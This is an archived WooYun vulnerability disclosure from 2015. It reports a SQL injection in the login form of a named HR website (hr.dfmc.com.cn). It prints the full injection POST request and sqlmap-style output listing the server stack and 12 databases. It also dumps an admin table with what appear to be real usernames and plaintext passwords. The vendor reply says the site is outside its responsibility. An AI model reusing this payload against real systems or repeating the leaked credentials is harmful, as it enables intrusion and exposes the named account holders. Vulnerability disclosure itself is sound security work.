乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-24: 细节已通知厂商并且等待厂商处理中 2015-08-25: 厂商已经主动忽略漏洞,细节向公众公开
RT
注入点:
POST /identify.asp HTTP/1.1Content-Length: 233Content-Type: application/x-www-form-urlencodedCookie: ASPSESSIONIDQQSQSQBQ=LKKJMMABOEGBJFBFICHNEHALHost: hr.dfmc.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Sub-mit=%c8%b7%20%b6%a8&password=g00dPa%24%24w0rD&username='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(70)%2bCHAR(55)%2bCHAR(50)%2bCHAR(120)%2bCHAR(86)%2bCHAR(49)%2bCHAR(100)%2bCHAR(82))%20FROM%20syscolumns)%2b
服务器的info:
[INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000
数据库12个:available databases [12]:[*] dfhr2006[*] DFHR_XTGL[*] DFHREP[*] dfhrmsnew[*] dfl_ntgl[*] dflcsalary[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb其中的一个库:
Database: dfhrmsnewTable: dbo.Admin_Job[7 entries]+------------+-----------+-----------+-----------+-----------+-----------+| Admin_Iden | Admin_UsN | Admin_Pwd | Admin_Num | Admin_TrN | Admin_Typ |+------------+-----------+-----------+-----------+-----------+-----------+| 0 | hudm | 199711 | LT | ??? | ????? || 0 | lijn | 8225935 | LT | ??? | ????? || 0 | dengjl | 98221265 | LT | ???????? | ????? || 0 | caojm | cjmcls | LT | ??? | ????? || 0 | yuwq | jhl@ywq | LT | ??? | ????? || 0 | lihw | lihw | LT | ??? | ????? || 0 | ssm | ssm0415 | IT | ??? | ????? |+------------+-----------+-----------+-----------+-----------+-----------+
数据库12个:available databases [12]:[*] dfhr2006[*] DFHR_XTGL[*] DFHREP[*] dfhrmsnew[*] dfl_ntgl[*] dflcsalary[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb
过滤特殊字符
危害等级:无影响厂商忽略
忽略时间:2015-08-25 09:04
感谢提醒,但是网站不属我司管辖范围。谢谢!
暂无